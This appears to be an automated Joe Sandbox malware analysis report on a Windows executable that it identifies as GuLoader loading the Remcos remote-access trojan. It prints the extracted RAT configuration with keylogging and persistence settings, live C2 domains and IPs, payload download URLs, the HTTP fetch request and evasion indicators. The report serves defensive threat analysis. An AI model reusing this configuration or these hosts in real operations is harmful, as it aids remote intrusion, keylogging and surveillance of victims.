Loading ...

Play interactive tourEdit tour

Windows Analysis Report 466XoziOLD.exe

Overview

General Information

Sample Name:466XoziOLD.exe
Analysis ID:491189
MD5:84ade48e59ed36c620d254d325f355d7
SHA1:6e17eb18c64e00ca9831e940769da9c744a5d5e3
SHA256:8060a88a8253eafc4c38d56d58d8470b98765308aeafc1e873b95011cbb8cadf
Tags:exeRemcosRAT
Infos:

Most interesting Screenshot:

Detection

GuLoader Remcos
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Potential malicious icon found
Multi AV Scanner detection for submitted file
GuLoader behavior detected
Yara detected Remcos RAT
Yara detected GuLoader
Hides threads from debuggers
Tries to detect Any.run
C2 URLs / IPs found in malware configuration
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Uses dynamic DNS services
Creates a DirectInput object (often for capturing keystrokes)
Uses 32bit PE files
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected TCP or UDP traffic on non-standard ports
Internet Provider seen in connection with other malware
Detected potential crypto function
Contains functionality to call native functions
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Abnormal high CPU Usage

Classification

Process Tree

  • System is w10x64
  • 466XoziOLD.exe (PID: 6952 cmdline: 'C:\Users\user\Desktop\466XoziOLD.exe' MD5: 84ADE48E59ED36C620D254D325F355D7)
    • 466XoziOLD.exe (PID: 6324 cmdline: 'C:\Users\user\Desktop\466XoziOLD.exe' MD5: 84ADE48E59ED36C620D254D325F355D7)
  • cleanup

Malware Configuration

Threatname: Remcos

{"Host:Port:Password": "solex-wave.duckdns.org:2404:0solex-wave.duckdns.org:2222:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Remcos-Y0PK9D", "Keylog flag": "0", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "20000"}

Threatname: GuLoader

{"Payload URL": "http://sopage.duckdns.org/Remcos_sgJ"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
0000000E.00000002.1183123485.00000000006F4000.00000004.00000020.sdmpJoeSecurity_RemcosYara detected Remcos RATJoe Security
    00000000.00000002.928545943.0000000002B80000.00000040.00000001.sdmpJoeSecurity_GuLoader_2Yara detected GuLoaderJoe Security

      Sigma Overview

      No Sigma rule has matched

      Jbx Signature Overview

      Click to jump to signature section

      Show All Signature Results

      AV Detection:

      barindex
      Found malware configurationShow sources
      Source: 0000000E.00000002.1183123485.00000000006F4000.00000004.00000020.sdmpMalware Configuration Extractor: Remcos {"Host:Port:Password": "solex-wave.duckdns.org:2404:0solex-wave.duckdns.org:2222:1", "Assigned name": "RemoteHost", "Connect interval": "1", "Install flag": "Disable", "Setup HKCU\\Run": "Enable", "Setup HKLM\\Run": "Disable", "Install path": "AppData", "Copy file": "remcos.exe", "Startup value": "Remcos", "Hide file": "Disable", "Mutex": "Remcos-Y0PK9D", "Keylog flag": "0", "Keylog path": "AppData", "Keylog file": "logs.dat", "Keylog crypt": "Disable", "Hide keylog file": "Disable", "Screenshot flag": "Disable", "Screenshot time": "10", "Take Screenshot option": "Disable", "Take screenshot title": "notepad;solitaire;", "Take screenshot time": "5", "Screenshot path": "AppData", "Screenshot file": "Screenshots", "Screenshot crypt": "Disable", "Mouse option": "Disable", "Delete file": "Disable", "Audio record time": "5", "Audio path": "AppData", "Audio folder": "MicRecords", "Connect delay": "0", "Copy folder": "Remcos", "Keylog folder": "remcos", "Keylog file max size": "20000"}
      Source: 00000000.00000002.928545943.0000000002B80000.00000040.00000001.sdmpMalware Configuration Extractor: GuLoader {"Payload URL": "http://sopage.duckdns.org/Remcos_sgJ"}
      Multi AV Scanner detection for submitted fileShow sources
      Source: 466XoziOLD.exeVirustotal: Detection: 29%Perma Link
      Source: 466XoziOLD.exeReversingLabs: Detection: 17%
      Yara detected Remcos RATShow sources
      Source: Yara matchFile source: 0000000E.00000002.1183123485.00000000006F4000.00000004.00000020.sdmp, type: MEMORY
      Machine Learning detection for sampleShow sources
      Source: 466XoziOLD.exeJoe Sandbox ML: detected
      Source: 466XoziOLD.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED

      Networking:

      barindex
      Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
      Source: TrafficSnort IDS: 2032776 ET TROJAN Remocs 3.x Unencrypted Checkin 192.168.2.4:49829 -> 23.146.242.71:2404
      Source: TrafficSnort IDS: 2032777 ET TROJAN Remocs 3.x Unencrypted Server Response 23.146.242.71:2404 -> 192.168.2.4:49829
      C2 URLs / IPs found in malware configurationShow sources
      Source: Malware configuration extractorURLs: solex-wave.duckdns.org
      Source: Malware configuration extractorURLs: http://sopage.duckdns.org/Remcos_sgJ
      Uses dynamic DNS servicesShow sources
      Source: unknownDNS query: name: sopage.duckdns.org
      Source: unknownDNS query: name: solex-wave.duckdns.org
      Source: global trafficHTTP traffic detected: GET /Remcos_s_bChlcwVW46.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: sopage.duckdns.orgCache-Control: no-cache
      Source: global trafficTCP traffic: 192.168.2.4:49829 -> 23.146.242.71:2404
      Source: Joe Sandbox ViewASN Name: VDI-NETWORKUS VDI-NETWORKUS
      Source: Joe Sandbox ViewASN Name: VDI-NETWORKUS VDI-NETWORKUS
      Source: 466XoziOLD.exe, 0000000E.00000002.1183375129.0000000002270000.00000004.00000001.sdmpString found in binary or memory: http://backupsoldyn.duckdns.org/Remcos_s_bChlcwVW46.bin
      Source: 466XoziOLD.exe, 0000000E.00000002.1183375129.0000000002270000.00000004.00000001.sdmpString found in binary or memory: http://sopage.duckdns.org/Remcos_s_bChlcwVW46.bin
      Source: 466XoziOLD.exe, 0000000E.00000002.1183375129.0000000002270000.00000004.00000001.sdmpString found in binary or memory: http://sopage.duckdns.org/Remcos_s_bChlcwVW46.binhttp://backupsoldyn.duckdns.org/Remcos_s_bChlcwVW46
      Source: unknownDNS traffic detected: queries for: sopage.duckdns.org
      Source: global trafficHTTP traffic detected: GET /Remcos_s_bChlcwVW46.bin HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: sopage.duckdns.orgCache-Control: no-cache
      Source: 466XoziOLD.exe, 00000000.00000002.927536241.000000000073A000.00000004.00000020.sdmpBinary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

      E-Banking Fraud:

      barindex
      Yara detected Remcos RATShow sources
      Source: Yara matchFile source: 0000000E.00000002.1183123485.00000000006F4000.00000004.00000020.sdmp, type: MEMORY

      System Summary:

      barindex
      Potential malicious icon foundShow sources
      Source: initial sampleIcon embedded in PE file: bad icon match: 20047c7c70f0e004
      Source: 466XoziOLD.exeStatic PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
      Source: 466XoziOLD.exe, 00000000.00000002.927338224.0000000000430000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameskraalinjers.exe vs 466XoziOLD.exe
      Source: 466XoziOLD.exe, 0000000E.00000000.925461157.0000000000430000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameskraalinjers.exe vs 466XoziOLD.exe
      Source: 466XoziOLD.exeBinary or memory string: OriginalFilenameskraalinjers.exe vs 466XoziOLD.exe
      Source: 466XoziOLD.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
      Source: C:\Users\user\Desktop\466XoziOLD.exeCode function: 0_2_02B8DCB9
      Source: C:\Users\user\Desktop\466XoziOLD.exeCode function: 0_2_02B88E84
      Source: C:\Users\user\Desktop\466XoziOLD.exeCode function: 0_2_02B80BAF
      Source: C:\Users\user\Desktop\466XoziOLD.exeCode function: 0_2_02B89180
      Source: C:\Users\user\Desktop\466XoziOLD.exeCode function: 0_2_02B8CB37
      Source: C:\Users\user\Desktop\466XoziOLD.exeCode function: 0_2_02B8C8CE
      Source: C:\Users\user\Desktop\466XoziOLD.exeCode function: 0_2_02B8D818
      Source: C:\Users\user\Desktop\466XoziOLD.exeCode function: 0_2_02B8C81A
      Source: C:\Users\user\Desktop\466XoziOLD.exeCode function: 0_2_02B8B801
      Source: C:\Users\user\Desktop\466XoziOLD.exeCode function: 0_2_02B8B950
      Source: C:\Users\user\Desktop\466XoziOLD.exeCode function: 0_2_02B89180 NtAllocateVirtualMemory,LoadLibraryA,
      Source: C:\Users\user\Desktop\466XoziOLD.exeCode function: 0_2_02B8CB37 NtWriteVirtualMemory,LoadLibraryA,
      Source: C:\Users\user\Desktop\466XoziOLD.exeCode function: 0_2_02B8D75C NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\466XoziOLD.exeCode function: 0_2_02B8D818 NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\466XoziOLD.exeCode function: 0_2_02B8C81A NtWriteVirtualMemory,
      Source: C:\Users\user\Desktop\466XoziOLD.exeCode function: 14_2_0056E5C9 NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\466XoziOLD.exeCode function: 14_2_0056E734 Sleep,NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\466XoziOLD.exeCode function: 14_2_0056E590 NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\466XoziOLD.exeCode function: 14_2_0056E608 NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\466XoziOLD.exeCode function: 14_2_0056E5B7 NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\466XoziOLD.exeCode function: 14_2_0056E5FD NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\466XoziOLD.exeCode function: 14_2_0056E678 NtProtectVirtualMemory,
      Source: C:\Users\user\Desktop\466XoziOLD.exeProcess Stats: CPU usage > 98%
      Source: 466XoziOLD.exeVirustotal: Detection: 29%
      Source: 466XoziOLD.exeReversingLabs: Detection: 17%
      Source: 466XoziOLD.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
      Source: C:\Users\user\Desktop\466XoziOLD.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
      Source: C:\Users\user\Desktop\466XoziOLD.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dll
      Source: unknownProcess created: C:\Users\user\Desktop\466XoziOLD.exe 'C:\Users\user\Desktop\466XoziOLD.exe'
      Source: C:\Users\user\Desktop\466XoziOLD.exeProcess created: C:\Users\user\Desktop\466XoziOLD.exe 'C:\Users\user\Desktop\466XoziOLD.exe'
      Source: C:\Users\user\Desktop\466XoziOLD.exeProcess created: C:\Users\user\Desktop\466XoziOLD.exe 'C:\Users\user\Desktop\466XoziOLD.exe'
      Source: C:\Users\user\Desktop\466XoziOLD.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32
      Source: C:\Users\user\Desktop\466XoziOLD.exeMutant created: \Sessions\1\BaseNamedObjects\Remcos-Y0PK9D
      Source: classification engineClassification label: mal100.rans.troj.evad.winEXE@3/0@2/2
      Source: C:\Users\user\Desktop\466XoziOLD.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\466XoziOLD.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
      Source: C:\Users\user\Desktop\466XoziOLD.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior

      Data Obfuscation:

      barindex
      Yara detected GuLoaderShow sources
      Source: Yara matchFile source: 00000000.00000002.928545943.0000000002B80000.00000040.00000001.sdmp, type: MEMORY
      Source: C:\Users\user\Desktop\466XoziOLD.exeCode function: 0_2_00429D50 push dword ptr [edi+000000BCh]; retn 0010h
      Source: C:\Users\user\Desktop\466XoziOLD.exeCode function: 0_2_00405408 push es; ret
      Source: C:\Users\user\Desktop\466XoziOLD.exeCode function: 0_2_0040581D push edx; retf
      Source: C:\Users\user\Desktop\466XoziOLD.exeCode function: 0_2_00406233 pushfd ; iretd
      Source: C:\Users\user\Desktop\466XoziOLD.exeCode function: 0_2_00406AF5 push eax; retf
      Source: C:\Users\user\Desktop\466XoziOLD.exeCode function: 0_2_004070B2 push esp; ret
      Source: C:\Users\user\Desktop\466XoziOLD.exeCode function: 0_2_00405F4E push edx; iretd
      Source: C:\Users\user\Desktop\466XoziOLD.exeCode function: 0_2_00405B50 push cs; ret
      Source: C:\Users\user\Desktop\466XoziOLD.exeCode function: 0_2_00403BC7 push FFFFFFC2h; retf
      Source: C:\Users\user\Desktop\466XoziOLD.exeCode function: 0_2_00403FC9 push edx; rep ret
      Source: C:\Users\user\Desktop\466XoziOLD.exeCode function: 0_2_004057EB push edx; retf
      Source: C:\Users\user\Desktop\466XoziOLD.exeCode function: 0_2_00405FFD push eax; iretd
      Source: C:\Users\user\Desktop\466XoziOLD.exeCode function: 0_2_0040579B push edx; retf
      Source: C:\Users\user\Desktop\466XoziOLD.exeCode function: 0_2_02B85293 push ebp; retf
      Source: initial sampleStatic PE information: section name: .text entropy: 7.42071533983
      Source: C:\Users\user\Desktop\466XoziOLD.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\466XoziOLD.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\466XoziOLD.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\466XoziOLD.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\466XoziOLD.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\466XoziOLD.exeProcess information set: NOOPENFILEERRORBOX
      Source: C:\Users\user\Desktop\466XoziOLD.exeProcess information set: NOOPENFILEERRORBOX

      Malware Analysis System Evasion:

      barindex
      Tries to detect Any.runShow sources
      Source: C:\Users\user\Desktop\466XoziOLD.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\466XoziOLD.exeFile opened: C:\Program Files\qga\qga.exe
      Source: C:\Users\user\Desktop\466XoziOLD.exeFile opened: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: C:\Users\user\Desktop\466XoziOLD.exeFile opened: C:\Program Files\qga\qga.exe
      Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
      Source: 466XoziOLD.exe, 00000000.00000002.928557354.0000000002BA0000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=WINDIR=\SYSWOW64\MSVBVM60.DLL
      Source: 466XoziOLD.exe, 0000000E.00000002.1183375129.0000000002270000.00000004.00000001.sdmpBinary or memory string: NTDLLKERNEL32USER32C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXEC:\PROGRAM FILES\QGA\QGA.EXEPSAPI.DLLMSI.DLLPUBLISHERSHELL32ADVAPI32TEMP=HTTP://SOPAGE.DUCKDNS.ORG/REMCOS_S_BCHLCWVW46.BINHTTP://BACKUPSOLDYN.DUCKDNS.ORG/REMCOS_S_BCHLCWVW46.BINWININET.DLLMOZILLA/5.0 (WINDOWS NT 6.1; WOW64; TRIDENT/7.0; RV:11.0) LIKE GECKO
      Source: 466XoziOLD.exe, 00000000.00000002.928557354.0000000002BA0000.00000004.00000001.sdmp, 466XoziOLD.exe, 0000000E.00000002.1183375129.0000000002270000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\QEMU-GA\QEMU-GA.EXE
      Source: C:\Users\user\Desktop\466XoziOLD.exe TID: 6556Thread sleep count: 214 > 30
      Source: C:\Users\user\Desktop\466XoziOLD.exeSystem information queried: ModuleInformation
      Source: 466XoziOLD.exe, 00000000.00000002.928557354.0000000002BA0000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=windir=\syswow64\msvbvm60.dll
      Source: 466XoziOLD.exe, 00000000.00000002.928557354.0000000002BA0000.00000004.00000001.sdmp, 466XoziOLD.exe, 0000000E.00000002.1183375129.0000000002270000.00000004.00000001.sdmpBinary or memory string: C:\Program Files\Qemu-ga\qemu-ga.exe
      Source: 466XoziOLD.exe, 0000000E.00000002.1183375129.0000000002270000.00000004.00000001.sdmpBinary or memory string: ntdllkernel32user32C:\Program Files\Qemu-ga\qemu-ga.exeC:\Program Files\qga\qga.exepsapi.dllMsi.dllPublishershell32advapi32TEMP=http://sopage.duckdns.org/Remcos_s_bChlcwVW46.binhttp://backupsoldyn.duckdns.org/Remcos_s_bChlcwVW46.binwininet.dllMozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko

      Anti Debugging:

      barindex
      Hides threads from debuggersShow sources
      Source: C:\Users\user\Desktop\466XoziOLD.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\466XoziOLD.exeThread information set: HideFromDebugger
      Source: C:\Users\user\Desktop\466XoziOLD.exeCode function: 0_2_02B8CB37 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\466XoziOLD.exeCode function: 0_2_02B88CB6 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\466XoziOLD.exeCode function: 0_2_02B8B2B7 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\466XoziOLD.exeCode function: 0_2_02B8BAC8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\user\Desktop\466XoziOLD.exeCode function: 0_2_02B890B9 LdrInitializeThunk,
      Source: C:\Users\user\Desktop\466XoziOLD.exeProcess created: C:\Users\user\Desktop\466XoziOLD.exe 'C:\Users\user\Desktop\466XoziOLD.exe'
      Source: 466XoziOLD.exe, 0000000E.00000002.1183303926.0000000000E60000.00000002.00020000.sdmpBinary or memory string: Program Manager
      Source: 466XoziOLD.exe, 0000000E.00000002.1183303926.0000000000E60000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
      Source: 466XoziOLD.exe, 0000000E.00000002.1183303926.0000000000E60000.00000002.00020000.sdmpBinary or memory string: Progman
      Source: 466XoziOLD.exe, 0000000E.00000002.1183303926.0000000000E60000.00000002.00020000.sdmpBinary or memory string: Progmanlock

      Stealing of Sensitive Information:

      barindex
      GuLoader behavior detectedShow sources
      Source: Initial fileSignature Results: GuLoader behavior
      Yara detected Remcos RATShow sources
      Source: Yara matchFile source: 0000000E.00000002.1183123485.00000000006F4000.00000004.00000020.sdmp, type: MEMORY

      Remote Access Functionality:

      barindex
      Yara detected Remcos RATShow sources
      Source: Yara matchFile source: 0000000E.00000002.1183123485.00000000006F4000.00000004.00000020.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
      Valid AccountsWindows Management InstrumentationPath InterceptionProcess Injection12Virtualization/Sandbox Evasion21Input Capture1Security Software Discovery31Remote ServicesInput Capture1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
      Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsProcess Injection12LSASS MemoryVirtualization/Sandbox Evasion21Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothNon-Standard Port1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
      Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Obfuscated Files or Information2Security Account ManagerProcess Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationIngress Tool Transfer1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
      Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Software Packing1NTDSRemote System Discovery1Distributed Component Object ModelInput CaptureScheduled TransferNon-Application Layer Protocol2SIM Card SwapCarrier Billing Fraud
      Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsSystem Information Discovery2SSHKeyloggingData Transfer Size LimitsApplication Layer Protocol212Manipulate Device CommunicationManipulate App Store Rankings or Ratings

      Behavior Graph

      Hide Legend

      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet

      Screenshots

      Thumbnails

      This section contains all screenshots as thumbnails, including those not shown in the slideshow.

      windows-stand

      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      SourceDetectionScannerLabelLink
      466XoziOLD.exe30%VirustotalBrowse
      466XoziOLD.exe18%ReversingLabs
      466XoziOLD.exe100%Joe Sandbox ML

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      SourceDetectionScannerLabelLink
      http://sopage.duckdns.org/Remcos_sgJ0%Avira URL Cloudsafe
      http://sopage.duckdns.org/Remcos_s_bChlcwVW46.binhttp://backupsoldyn.duckdns.org/Remcos_s_bChlcwVW460%Avira URL Cloudsafe
      http://sopage.duckdns.org/Remcos_s_bChlcwVW46.bin0%Avira URL Cloudsafe
      http://backupsoldyn.duckdns.org/Remcos_s_bChlcwVW46.bin0%Avira URL Cloudsafe
      solex-wave.duckdns.org0%Avira URL Cloudsafe

      Domains and IPs

      Contacted Domains

      NameIPActiveMaliciousAntivirus DetectionReputation
      sopage.duckdns.org
      23.146.242.85
      truetrue
        unknown
        solex-wave.duckdns.org
        23.146.242.71
        truetrue
          unknown

          Contacted URLs

          NameMaliciousAntivirus DetectionReputation
          http://sopage.duckdns.org/Remcos_sgJtrue
          • Avira URL Cloud: safe
          unknown
          http://sopage.duckdns.org/Remcos_s_bChlcwVW46.binfalse
          • Avira URL Cloud: safe
          unknown
          solex-wave.duckdns.orgtrue
          • Avira URL Cloud: safe
          unknown

          URLs from Memory and Binaries

          NameSourceMaliciousAntivirus DetectionReputation
          http://sopage.duckdns.org/Remcos_s_bChlcwVW46.binhttp://backupsoldyn.duckdns.org/Remcos_s_bChlcwVW46466XoziOLD.exe, 0000000E.00000002.1183375129.0000000002270000.00000004.00000001.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          http://backupsoldyn.duckdns.org/Remcos_s_bChlcwVW46.bin466XoziOLD.exe, 0000000E.00000002.1183375129.0000000002270000.00000004.00000001.sdmpfalse
          • Avira URL Cloud: safe
          unknown

          Contacted IPs

          • No. of IPs < 25%
          • 25% < No. of IPs < 50%
          • 50% < No. of IPs < 75%
          • 75% < No. of IPs

          Public

          IPDomainCountryFlagASNASN NameMalicious
          23.146.242.71
          solex-wave.duckdns.orgReserved
          46664VDI-NETWORKUStrue
          23.146.242.85
          sopage.duckdns.orgReserved
          46664VDI-NETWORKUStrue

          General Information

          Joe Sandbox Version:33.0.0 White Diamond
          Analysis ID:491189
          Start date:27.09.2021
          Start time:10:54:54
          Joe Sandbox Product:CloudBasic
          Overall analysis duration:0h 8m 52s
          Hypervisor based Inspection enabled:false
          Report type:light
          Sample file name:466XoziOLD.exe
          Cookbook file name:default.jbs
          Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
          Number of analysed new started processes analysed:16
          Number of new started drivers analysed:0
          Number of existing processes analysed:0
          Number of existing drivers analysed:0
          Number of injected processes analysed:0
          Technologies:
          • HCA enabled
          • EGA enabled
          • HDC enabled
          • AMSI enabled
          Analysis Mode:default
          Analysis stop reason:Timeout
          Detection:MAL
          Classification:mal100.rans.troj.evad.winEXE@3/0@2/2
          EGA Information:Failed
          HDC Information:
          • Successful, ratio: 34.7% (good quality ratio 9.5%)
          • Quality average: 14.4%
          • Quality standard deviation: 26.4%
          HCA Information:Failed
          Cookbook Comments:
          • Adjust boot time
          • Enable AMSI
          • Found application associated with file extension: .exe
          • Override analysis time to 240s for sample files taking high CPU consumption
          Warnings:
          Show All
          • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
          • TCP Packets have been reduced to 100
          • Excluded IPs from analysis (whitelisted): 23.54.113.53, 20.50.102.62, 20.54.110.249, 40.112.88.60, 23.10.249.26, 23.10.249.43
          • Excluded domains from analysis (whitelisted): displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, store-images.s-microsoft.com-c.edgekey.net, iris-de-prod-azsc-uks.uksouth.cloudapp.azure.com, a1449.dscg2.akamai.net, arc.msn.com, ris.api.iris.microsoft.com, e12564.dspb.akamaiedge.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
          • Report size getting too big, too many NtOpenKeyEx calls found.
          • Report size getting too big, too many NtQueryValueKey calls found.

          Simulations

          Behavior and APIs

          No simulations

          Joe Sandbox View / Context

          IPs

          MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
          23.146.242.71hVlpEajflR.exeGet hashmaliciousBrowse
            http___sowork.duckdns.org_11d_solex.exeGet hashmaliciousBrowse
              23.146.242.85hVlpEajflR.exeGet hashmaliciousBrowse
              • spage.duckdns.org/Remcos_S_tGNeLX139.bin
              0rUkHCgvVf.exeGet hashmaliciousBrowse
              • dpage.duckdns.org/remcos_d_fIqfwC80.bin
              JQPFEy9Ekx.exeGet hashmaliciousBrowse
              • dyn-bin.duckdns.org/remcos_d_fIqfwC80.bin
              http___sowork.duckdns.org_11d_solex.exeGet hashmaliciousBrowse
              • sol-bin.duckdns.org/Remcos_S_tGNeLX139.bin

              Domains

              No context

              ASN

              MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
              VDI-NETWORKUShVlpEajflR.exeGet hashmaliciousBrowse
              • 23.146.242.85
              0rUkHCgvVf.exeGet hashmaliciousBrowse
              • 23.146.242.85
              HxXHmM0T9f.exeGet hashmaliciousBrowse
              • 23.146.242.147
              JQPFEy9Ekx.exeGet hashmaliciousBrowse
              • 23.146.242.85
              http___sowork.duckdns.org_11d_solex.exeGet hashmaliciousBrowse
              • 23.146.242.85
              eXik5mFvet.exeGet hashmaliciousBrowse
              • 23.146.242.94
              CVEXzxk43s.exeGet hashmaliciousBrowse
              • 23.146.242.94
              yOCBr7SNLJ.exeGet hashmaliciousBrowse
              • 23.146.242.94
              13FlI4deWN.exeGet hashmaliciousBrowse
              • 23.146.242.94
              Payment Notification.exeGet hashmaliciousBrowse
              • 23.146.242.147
              Payment Notification.scr.exeGet hashmaliciousBrowse
              • 23.146.242.147
              Payment Notification.scr.exeGet hashmaliciousBrowse
              • 23.146.242.147
              Request For Quotation.jarGet hashmaliciousBrowse
              • 23.146.242.147
              OvBS76pTyX.exeGet hashmaliciousBrowse
              • 23.146.242.94
              U6lqJJBG8S.exeGet hashmaliciousBrowse
              • 23.146.242.94
              pNyAinWdWJ.exeGet hashmaliciousBrowse
              • 23.146.242.94
              YTVrQC7FhG.exeGet hashmaliciousBrowse
              • 23.146.242.94
              I4eRfFgJG7.exeGet hashmaliciousBrowse
              • 23.146.242.94
              sLVCW67F5w.exeGet hashmaliciousBrowse
              • 23.146.242.94
              http___s-rco.duckdns.org_11d_solex.exeGet hashmaliciousBrowse
              • 23.146.242.94
              VDI-NETWORKUShVlpEajflR.exeGet hashmaliciousBrowse
              • 23.146.242.85
              0rUkHCgvVf.exeGet hashmaliciousBrowse
              • 23.146.242.85
              HxXHmM0T9f.exeGet hashmaliciousBrowse
              • 23.146.242.147
              JQPFEy9Ekx.exeGet hashmaliciousBrowse
              • 23.146.242.85
              http___sowork.duckdns.org_11d_solex.exeGet hashmaliciousBrowse
              • 23.146.242.85
              eXik5mFvet.exeGet hashmaliciousBrowse
              • 23.146.242.94
              CVEXzxk43s.exeGet hashmaliciousBrowse
              • 23.146.242.94
              yOCBr7SNLJ.exeGet hashmaliciousBrowse
              • 23.146.242.94
              13FlI4deWN.exeGet hashmaliciousBrowse
